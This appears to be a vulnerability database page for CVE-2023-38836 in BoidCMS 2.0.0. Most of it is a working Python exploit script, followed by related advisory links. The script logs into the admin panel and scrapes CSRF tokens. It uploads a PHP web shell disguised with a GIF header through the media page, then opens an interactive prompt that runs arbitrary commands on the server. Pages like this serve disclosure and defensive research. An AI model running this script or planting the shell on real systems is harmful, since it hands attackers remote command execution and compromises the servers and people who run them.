Lucene search
1337kidPACKETSTORM:175026HistoryOct 10, 2023 - 12:00 a.m.
BoidCMS 2.0.0 Shell Upload
2023-10-1000:00:00
1337kid
packetstormsecurity.com
186
boidcms
shell upload
file upload
authentication
vulnerability
exploit
cve-2023-38836
ubuntu
rce
php shell
1337kid
file upload
boidcms.zip
website
admin
username
password
request
session
media
status code
0.673 Medium
EPSS
Percentile
98.0%
`#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)
`
Related
osv
osv
CVE-2023-38836
2023-08-21 17:15:47
zdt
zdt
BoidCMS v2.0.0 - authenticated file upload Exploit
2023-10-09 00:00:00
BoidCMS 2.0.0 Command Injection Exploit
2024-03-02 00:00:00
cve
cve
CVE-2023-38836
2023-08-21 17:15:47
metasploit
metasploit
BoidCMS Command Injection
2024-02-12 23:44:24
cvelist
cvelist
CVE-2023-38836
2023-08-21 00:00:00
githubexploit
githubexploit
Exploit for Unrestricted Upload of File with Dangerous Type in Boidcms
2023-08-16 14:30:30
nvd
nvd
CVE-2023-38836
2023-08-21 17:15:47
prion
prion
Unrestricted file upload
2023-08-21 17:15:00
packetstorm
packetstorm
BoidCMS 2.0.0 Command Injection
2024-03-01 00:00:00
exploitdb
exploitdb
BoidCMS v2.0.0 - authenticated file upload vulnerability
2023-10-09 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-Up 03/08/2024
2024-03-08 17:00:00